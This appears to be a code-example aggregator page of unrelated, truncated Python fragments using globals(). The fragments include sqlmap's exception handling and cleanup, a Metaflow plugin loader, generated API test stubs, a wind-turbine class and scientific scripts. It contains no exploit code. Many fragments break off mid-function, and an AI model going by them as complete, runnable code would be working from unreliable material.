        elif "_mkstemp_inner" in excMsg:
            errMsg = "there has been a problem while accessing temporary files"
            logger.critical(errMsg)
            raise SystemExit

        elif any(_ in excMsg for _ in ("tempfile.mkdtemp", "tempfile.mkstemp",
                                       "tempfile.py")):
            errMsg = "unable to write to the temporary directory '%s'. " % tempfile.gettempdir(
            )
            errMsg += "Please make sure that your disk is not full and "
            errMsg += "that you have sufficient write permissions to "
            errMsg += "create temporary files and/or directories"
            logger.critical(errMsg)
            raise SystemExit

        elif "Permission denied: '" in excMsg:
            match = re.search(r"Permission denied: '([^']*)", excMsg)
            errMsg = "permission error occurred while accessing file '%s'" % match.group(
                1)
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg for _ in ("twophase", "sqlalchemy")):
            errMsg = "please update the 'sqlalchemy' package (>= 1.1.11) "
            errMsg += "(Reference: 'https://qiita.com/tkprof/items/7d7b2d00df9c5f16fffe')"
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg for _ in ("scramble_caching_sha2", "TypeError")):
            errMsg = "please downgrade the 'PyMySQL' package (=< 0.8.1) "
            errMsg += "(Reference: 'https://github.com/PyMySQL/PyMySQL/issues/700')"
            logger.critical(errMsg)
            raise SystemExit

        elif "must be pinned buffer, not bytearray" in excMsg:
            errMsg = "error occurred at Python interpreter which "
            errMsg += "is fixed in 2.7. Please update accordingly "
            errMsg += "(Reference: 'https://bugs.python.org/issue8104')"
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg for _ in ("Resource temporarily unavailable",
                                       "os.fork()", "dictionaryAttack")):
            errMsg = "there has been a problem while running the multiprocessing hash cracking. "
            errMsg += "Please rerun with option '--threads=1'"
            logger.critical(errMsg)
            raise SystemExit

        elif "can't start new thread" in excMsg:
            errMsg = "there has been a problem while creating new thread instance. "
            errMsg += "Please make sure that you are not running too many processes"
            if not IS_WIN:
                errMsg += " (or increase the 'ulimit -u' value)"
            logger.critical(errMsg)
            raise SystemExit

        elif "can't allocate read lock" in excMsg:
            errMsg = "there has been a problem in regular socket operation "
            errMsg += "('%s')" % excMsg.strip().split('\n')[-1]
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg for _ in ("pymysql", "configparser")):
            errMsg = "wrong initialization of pymsql detected (using Python3 dependencies)"
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg
                 for _ in ("ntlm", "socket.error, err", "SyntaxError")):
            errMsg = "wrong initialization of python-ntlm detected (using Python2 syntax)"
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg for _ in ("drda", "to_bytes")):
            errMsg = "wrong initialization of drda detected (using Python3 syntax)"
            logger.critical(errMsg)
            raise SystemExit

        elif "'WebSocket' object has no attribute 'status'" in excMsg:
            errMsg = "wrong websocket library detected"
            errMsg += " (Reference: 'https://github.com/sqlmapproject/sqlmap/issues/4572#issuecomment-775041086')"
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg for _ in ("window = tkinter.Tk()", )):
            errMsg = "there has been a problem in initialization of GUI interface "
            errMsg += "('%s')" % excMsg.strip().split('\n')[-1]
            logger.critical(errMsg)
            raise SystemExit

        elif any(_ in excMsg for _ in ("unable to access item 'liveTest'", )):
            errMsg = "detected usage of files from different versions of sqlmap"
            logger.critical(errMsg)
            raise SystemExit

        elif kb.get("dumpKeyboardInterrupt"):
            raise SystemExit

        elif any(_ in excMsg for _ in ("Broken pipe", )):
            raise SystemExit

        elif valid is False:
            errMsg = "code integrity check failed (turning off automatic issue creation). "
            errMsg += "You should retrieve the latest development version from official GitHub "
            errMsg += "repository at '%s'" % GIT_PAGE
            logger.critical(errMsg)
            print()
            dataToStdout(excMsg)
            raise SystemExit

        elif any(_ in excMsg for _ in ("tamper/", "waf/")):
            logger.critical(errMsg)
            print()
            dataToStdout(excMsg)
            raise SystemExit

        elif any(_ in excMsg
                 for _ in ("ImportError", "ModuleNotFoundError",
                           "Can't find file for module",
                           "SAXReaderNotAvailable",
                           "source code string cannot contain null bytes",
                           "No module named", "tp_name field")):
            errMsg = "invalid runtime environment ('%s')" % excMsg.split(
                "Error: ")[-1].strip()
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg
                 for _ in ("SyntaxError: Non-ASCII character", ".py on line",
                           "but no encoding declared")):
            errMsg = "invalid runtime environment ('%s')" % excMsg.split(
                "Error: ")[-1].strip()
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg for _ in ("No such file", "_'")):
            errMsg = "corrupted installation detected ('%s'). " % excMsg.strip(
            ).split('\n')[-1]
            errMsg += "You should retrieve the latest development version from official GitHub "
            errMsg += "repository at '%s'" % GIT_PAGE
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg for _ in ("No such file", "sqlmap.conf", "Test")):
            errMsg = "you are trying to run (hidden) development tests inside the production environment"
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg
                 for _ in ("HTTPNtlmAuthHandler",
                           "'str' object has no attribute 'decode'")):
            errMsg = "package 'python-ntlm' has a known compatibility issue with the "
            errMsg += "Python 3 (Reference: 'https://github.com/mullender/python-ntlm/pull/61')"
            logger.critical(errMsg)
            raise SystemExit

        elif "'DictObject' object has no attribute '" in excMsg and all(
                _ in errMsg for _ in ("(fingerprinted)", "(identified)")):
            errMsg = "there has been a problem in enumeration. "
            errMsg += "Because of a considerable chance of false-positive case "
            errMsg += "you are advised to rerun with switch '--flush-session'"
            logger.critical(errMsg)
            raise SystemExit

        elif "bad marshal data (unknown type code)" in excMsg:
            match = re.search(r"\s*(.+)\s+ValueError", excMsg)
            errMsg = "one of your .pyc files are corrupted%s" % (
                " ('%s')" % match.group(1) if match else "")
            errMsg += ". Please delete .pyc files on your system to fix the problem"
            logger.critical(errMsg)
            raise SystemExit

        for match in re.finditer(r'File "(.+?)", line', excMsg):
            file_ = match.group(1)
            try:
                file_ = os.path.relpath(file_, os.path.dirname(__file__))
            except ValueError:
                pass
            file_ = file_.replace("\\", '/')
            if "../" in file_:
                file_ = re.sub(r"(\.\./)+", '/', file_)
            else:
                file_ = file_.lstrip('/')
            file_ = re.sub(r"/{2,}", '/', file_)
            excMsg = excMsg.replace(match.group(1), file_)

        errMsg = maskSensitiveData(errMsg)
        excMsg = maskSensitiveData(excMsg)

        if conf.get("api") or not valid:
            logger.critical("%s\n%s" % (errMsg, excMsg))
        else:
            logger.critical(errMsg)
            dataToStdout("%s\n" %
                         setColor(excMsg.strip(), level=logging.CRITICAL))
            createGithubIssue(errMsg, excMsg)

    finally:
        kb.threadContinue = False

        if getDaysFromLastUpdate() > LAST_UPDATE_NAGGING_DAYS:
            warnMsg = "your sqlmap version is outdated"
            logger.warn(warnMsg)

        if conf.get("showTime"):
            dataToStdout("\n[*] ending @ %s\n\n" %
                         time.strftime("%X /%Y-%m-%d/"),
                         forceOutput=True)

        kb.threadException = True

        if kb.get("tempDir"):
            for prefix in (MKSTEMP_PREFIX.IPC, MKSTEMP_PREFIX.TESTING,
                           MKSTEMP_PREFIX.COOKIE_JAR,
                           MKSTEMP_PREFIX.BIG_ARRAY):
                for filepath in glob.glob(
                        os.path.join(kb.tempDir, "%s*" % prefix)):
                    try:
                        os.remove(filepath)
                    except OSError:
                        pass

            if not filterNone(
                    filepath
                    for filepath in glob.glob(os.path.join(kb.tempDir, '*'))
                    if not any(
                        filepath.endswith(_)
                        for _ in (".lock", ".exe", ".so",
                                  '_'))):  # ignore junk files
                try:
                    shutil.rmtree(kb.tempDir, ignore_errors=True)
                except OSError:
                    pass

        if conf.get("hashDB"):
            conf.hashDB.flush(True)

        if conf.get("harFile"):
            try:
                with openFile(conf.harFile, "w+b") as f:
                    json.dump(conf.httpCollector.obtain(),
                              fp=f,
                              indent=4,
                              separators=(',', ': '))
            except SqlmapBaseException as ex:
                errMsg = getSafeExString(ex)
                logger.critical(errMsg)

        if conf.get("api"):
            conf.databaseCursor.disconnect()

        if conf.get("dumper"):
            conf.dumper.flush()

        # short delay for thread finalization
        _ = time.time()
        while threading.activeCount() > 1 and (
                time.time() - _) > THREAD_FINALIZATION_TIMEOUT:
            time.sleep(0.01)

        if cmdLineOptions.get("sqlmapShell"):
            cmdLineOptions.clear()
            conf.clear()
            kb.clear()
            conf.disableBanner = True
            main()
Пример #48
0
def get_info(name):
    g = globals()
    return g.get(name, g.get(name + "_info", {}))
Пример #49
0
 # We load into globals whatever we have in extension_module
 # We specifically exclude any modules that may be included (like sys, os, etc)
 # *except* for ones that are part of metaflow_custom (basically providing
 # an aliasing mechanism)
 lazy_load_custom_modules = {}
 addl_modules = _ext_plugins.__dict__.get('__mf_promote_submodules__')
 if addl_modules:
     # We make an alias for these modules which the metaflow_custom author
     # wants to expose but that may not be loaded yet
     lazy_load_custom_modules = {
         'metaflow.plugins.%s' % k: 'metaflow_custom.plugins.%s' % k
         for k in addl_modules
     }
 for n, o in _ext_plugins.__dict__.items():
     if not n.startswith('__') and not isinstance(o, types.ModuleType):
         globals()[n] = o
     elif isinstance(o, types.ModuleType) and o.__package__ and \
             o.__package__.startswith('metaflow_custom'):
         lazy_load_custom_modules['metaflow.plugins.%s' % n] = o
 if lazy_load_custom_modules:
     # NOTE: We load things first to have metaflow_custom override things here.
     # This does mean that for modules that have the same name (for example,
     # if metaflow_custom.plugins also provides a conda module), it needs
     # to provide whatever is expected below (so for example a `conda_step_decorator`
     # file with a `CondaStepDecorator` class).
     # We do this because we want metaflow_custom to fully override things
     # and if we did not change sys.meta_path here, the lines below would
     # load the non metaflow_custom modules providing for possible confusion.
     # This keeps it cleaner.
     from metaflow import _LazyLoader
     sys.meta_path = [_LazyLoader(lazy_load_custom_modules)] + sys.meta_path
Пример #50
0
e = 2
while True:
    print("At modulus %s." % e)
    previous_idempotents = [((), Partition(()))]
    level = 0
    cartan_matrix = []
    while len(cartan_matrix) <= 50:
        print("At level %s for mod %s." % (level, e))
        for i, (idemp, part) in enumerate(previous_idempotents):
            print("w_%s: %s" % (i, idemp))
            sys.stdout.flush()
        for i, (idemp, part) in enumerate(previous_idempotents):
            print("w_%s crystal node: %s" % (i, part.parts))
            sys.stdout.flush()
        for i, (idemp, part) in enumerate(previous_idempotents):
            print("e_{w_%s}(\emptyset) = %s" % (i, evaluate_inducts(idemp, e)))
            sys.stdout.flush()
        cartan_matrix = compute_reduced_cartan_matrix(
            map(lambda pair: pair[0], previous_idempotents), e)
        print("Reduced (Crystal) Cartan matrix:")
        #print("["+",\n ".join(map(str, cartan_matrix)) + "]")
        print_matrix(cartan_matrix)
        sys.stdout.flush()
        previous_idempotents = compute_crystal(e, previous_idempotents)
        level += 1
    e += 1

if __name__ == '__main__':
    import code
    code.interact(local=globals())
Пример #51
0
def lazy_import():
    from intersight.model.iam_account_relationship import IamAccountRelationship
    globals()['IamAccountRelationship'] = IamAccountRelationship
Пример #52
0
    from lib.core.option import initOptions
    from lib.core.patch import dirtyPatches
    from lib.core.patch import resolveCrossReferences
    from lib.core.settings import GIT_PAGE
    from lib.core.settings import IS_WIN
    from lib.core.settings import LAST_UPDATE_NAGGING_DAYS
    from lib.core.settings import LEGAL_DISCLAIMER
    from lib.core.settings import THREAD_FINALIZATION_TIMEOUT
    from lib.core.settings import UNICODE_ENCODING
    from lib.core.settings import VERSION
    from lib.parse.cmdline import cmdLineParser
    from lib.utils.crawler import crawl
except KeyboardInterrupt:
    errMsg = "user aborted"

    if "logger" in globals():
        logger.critical(errMsg)
        raise SystemExit
    else:
        import time
        sys.exit("\r[%s] [CRITICAL] %s" % (time.strftime("%X"), errMsg))


def modulePath():
    """
    This will get us the program's directory, even if we are frozen
    using py2exe
    """

    try:
        _ = sys.executable if weAreFrozen() else __file__
Пример #53
0
    The version of the OpenAPI document: 0.5.0-master.56
    Generated by: https://openapi-generator.tech
"""


import sys
import unittest

import madana_apiclient
from madana_apiclient.model.json_enclave_port import JsonEnclavePort
from madana_apiclient.model.json_environment import JsonEnvironment
from madana_apiclient.model.json_kubernetes_enclave import JsonKubernetesEnclave
from madana_apiclient.model.json_process import JsonProcess
from madana_apiclient.model.json_wireguard_interface import JsonWireguardInterface
globals()['JsonEnclavePort'] = JsonEnclavePort
globals()['JsonEnvironment'] = JsonEnvironment
globals()['JsonKubernetesEnclave'] = JsonKubernetesEnclave
globals()['JsonProcess'] = JsonProcess
globals()['JsonWireguardInterface'] = JsonWireguardInterface
from madana_apiclient.model.json_enclave_process import JsonEnclaveProcess


class TestJsonEnclaveProcess(unittest.TestCase):
    """JsonEnclaveProcess unit test stubs"""

    def setUp(self):
        pass

    def tearDown(self):
        pass
Пример #54
0
def invoke(name, *args, **kwargs):
    func = globals().get(name)
    if func:
        return func(*args, **kwargs)
Пример #55
0
        intersection = tf.reduce_sum(tf.cast(intersection_mask, tf.float32), axis=1)
        union = tf.reduce_sum(tf.cast(union_mask, tf.float32), axis=1)

        iou = tf.where(union == 0, 1., intersection / union)
        return super().update_state(iou, sample_weight)

if __name__ == "__main__":
    # Parse arguments
    parser = argparse.ArgumentParser()
    parser.add_argument("predictions", type=str, help="Path to predicted output.")
    parser.add_argument("dataset", type=str, help="Which dataset to evaluate ('dev', 'test').")
    parser.add_argument("--seed", default=42, type=int, help="Random seed.")
    parser.add_argument("--threads", default=1, type=int, help="Maximum number of threads to use.")
    parser.add_argument("--verbose", default=False, action="store_true", help="Verbose TF logging.")
    args = parser.parse_args([] if "__file__" not in globals() else None)

    # Fix random seeds and threads
    np.random.seed(args.seed)
    tf.random.set_seed(args.seed)
    tf.config.threading.set_inter_op_parallelism_threads(args.threads)
    tf.config.threading.set_intra_op_parallelism_threads(args.threads)

    # Report only errors by default
    if not args.verbose:
        os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3"

    # Load the gold data
    gold_masks = getattr(CAGS(), args.dataset).map(CAGS.parse).map(lambda example: example["mask"])

    # Create the metric
Пример #56
0
                writer.writerow([did, 'all', cid])

        # 學分學程、跨域學程、其他課程
        for type_name, type in [('學分學程', program), ('跨領域學程', cross),
                                ('其他課程', others)]:
            category_map[type_name] = OrderedDict()
            for dep_name, dep in type.items():
                graduateds.append(dep_name)
                did = graduateds.index(dep_name)
                category_map[type_name][dep_name] = did
                writer.writerows([[did, 'all', cid] for cid in dep])

        # 教育學程
        graduateds.append('教育學程')
        did = graduateds.index('教育學程')
        category_map['教育學程'] = did
        writer.writerows([[did, 'all', cid] for cid in education['教育學程']])

    # with open('graduateds.csv', 'w', newline='')as csvfile:
    #     writer = csv.writer(csvfile, delimiter=',')
    #     writer.writerows(list(enumerate(graduateds)))

    with open(os.path.join(root, 'category_map.json'), 'w',
              encoding="utf-8") as f:
        json.dump(category_map, f, indent=4, ensure_ascii=False)


if __name__ == '__main__':
    import code
    code.interact(local=dict(globals(), **locals()))
Пример #57
0
    def addTurbine(
        self,
        uniqueID,
        turbineType="SRT",
        diameter=float("NaN"),
        hubHeigt=float("NaN"),
        x_horizontal=float("NaN"),
        y_vertical=float("NaN")
    ):  ##This function helps to create a wind turbine and keep internal (inside the class) track of its name. It is not a deep copy, rather a reference.
        """
        By default adds a single rotor turbine (SRT) to the related windfarm. Returns the created wind turbine with the given unique ID.
        The wind turbine would be callable via its unique name and via the assigned variable by user. Note that the referenced unique id is temporarly stored in library. Thus when calling the turbine via unique id, it should be prefixed by library name pywinda. See example below.

        :param uniqueID: [*req*] Unique ID of the wind turbine as string
        :param turbineType: [*opt*] Type of turbine as string: 'SRT' or 'MRT'
        :param diameter: [*opt*] Diameter of the turbine as float
        :param hubHeigt: [*opt*] Hub height as a float
        :param x_horizontal: [*opt*] Horizontal coordinate of the turbine as float
        :param y_vertical: [*opt*] Vertical coordinate of the the turbine as float

        :Example:

            >>> DanTysk=pywinda.windfar("TheDanTysk")
            >>> WT1=DanTysk.addTurbine("D_WT1")
            >>> WT2=DanTysk.addTurbine("D_WT2",diameter=120)
            >>> WT3=DanTysk.addTurbine("D_WT3",x_horizontal=580592,y_vertical=5925253)
            >>> WT3.diameter=150 #Assiging WT3 diameter after creation.
            >>> print(WT1==pywinda.D_WT1)
            True

        \-----------------------------------------------------------------------------------------------------------------------------------------------------------

        """

        if uniqueID in self.createdSRTs:  #Checks if the given unique Id already exists in the wind farm
            print("A wind turbine with the same unique ID in wind farm [",
                  str(self.uID), "] already exists. New turbine not added.")
        else:
            if type(uniqueID) == str and len(uniqueID.split()) == 1:
                if uniqueID in globals().keys(
                ):  #Checks if the given unique Id is not in conflict with user's already assigned variables.
                    print(
                        "A wind turbine witht the same uniqe ID globally exists. New turbine not added."
                    )
                else:
                    if turbineType == "SRT":
                        globals()[uniqueID] = toUserVariable = SRT(
                            uniqueID,
                            diameter=diameter,
                            hubHeigt=hubHeigt,
                            x_horizontal=x_horizontal,
                            y_vertical=y_vertical
                        )  # windfarm class is dynamicall created and referenced with the unique ID to the users assigned variable.
                        self.__numOfSRT += 1
                        self.createdSRTs.append(uniqueID)
                    elif turbineType == "MRT":
                        globals()[uniqueID] = toUserVariable = MRT(
                            uniqueID,
                            diameter=diameter,
                            hubHeigt=hubHeigt,
                            x_horizontal=x_horizontal,
                            y_vertical=y_vertical
                        )  # windfarm class is dynamicall created and referenced with the unique ID to the users assigned variable.
                        self.__numOfMRT += 1
                        self.createdMRTs.append(uniqueID)
                    else:
                        print("Turbine type not supported")

            else:
                print("Name should be a string without spaces.")

            return toUserVariable
Пример #58
0
import base.readConfig
this=base.readConfig.init(globals())
tstep=1/250.#Simulation timestep in seconds (250Hz).
AOExpTime=0.#40 seconds exposure (use --iterations=xxx to modify)
npup=112#Number of phase points across the pupil
telDiam=4.2 #telescope diameter
telSec=4.2/3.5#Central obscuration
ntel=npup#Telescope diameter in pixels
ngsLam=640.#NGS wavelength
lgsLam=589.#LGS wavelength
sciLam=1650.#Science wavelength
ngsAsterismRadius=90.#arcseconds
nsci=1
nngs=4
ndm=1
import util.tel
#Create a pupil function
pupil=util.tel.Pupil(npup,ntel/2,ntel/2*telSec/telDiam)

#Create the WFS overview
import util.guideStar
#import util.elong
#Create the LGS PSFs (elongated).  There are many ways to do this - this is a simple one.
#lgssig=1e6
#psf=util.elong.make(spotsize=phasesize*4,nsubx=wfs_nsubx,wfs_n=phasesize,lam=lgsLam,telDiam=telDiam,telSec=telSec,beacon_alt=lgsalt,beacon_depth=10000.,launchDist=0.,launchTheta=0.,pup=pupil,photons=lgssig)[0]

sourceList=[]
wfsDict={}
for i in range(nngs-1):#7x7 off-axis NGS
    id="%d"%(i+1)
Пример #59
0
if '__file__' in globals():
    import os, sys
    print('__file__ in globals at layers.py')
    sys.path.append(os.path.join(os.path.dirname(__file__), '..'))


from myPackage.core_complex import Variable, Parameter
import numpy as np
import weakref
import myPackage.functions as F


class Layer:
    """
    Layer class
    -----------
    input, hidden, output layer에 대한 기반클래스

    Args
    ----
    name: Layer's name.
    value: Layer's value is put in name's attritube.
    inputs: This parameter means layer's input data.

    Method
    ------
    __setattr__: Get parameter(name, value) and check a value's type in Parameter instance. Then, set attribute value about name.
    __call__: Make callable function instance with inputs value(get variable argument)(This method use weakref.ref for help to circular reference.).
    forward: It will be necessary method from derived class.
    params: Yield a layer instances value using iterator.
# coding: utf-8

# Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.
# This product includes software developed at Datadog (https://www.datadoghq.com/).
# Copyright 2019-Present Datadog, Inc.

import sys
import unittest

import datadog_api_client.v2
from datadog_api_client.v2.model.incident_field_attributes import IncidentFieldAttributes
globals()['IncidentFieldAttributes'] = IncidentFieldAttributes
from datadog_api_client.v2.model.incident_response_attributes import IncidentResponseAttributes


class TestIncidentResponseAttributes(unittest.TestCase):
    """IncidentResponseAttributes unit test stubs"""
    def setUp(self):
        pass

    def tearDown(self):
        pass

    def testIncidentResponseAttributes(self):
        """Test IncidentResponseAttributes"""
        # FIXME: construct object with mandatory attributes with example values
        # model = IncidentResponseAttributes()  # noqa: E501
        pass


if __name__ == '__main__':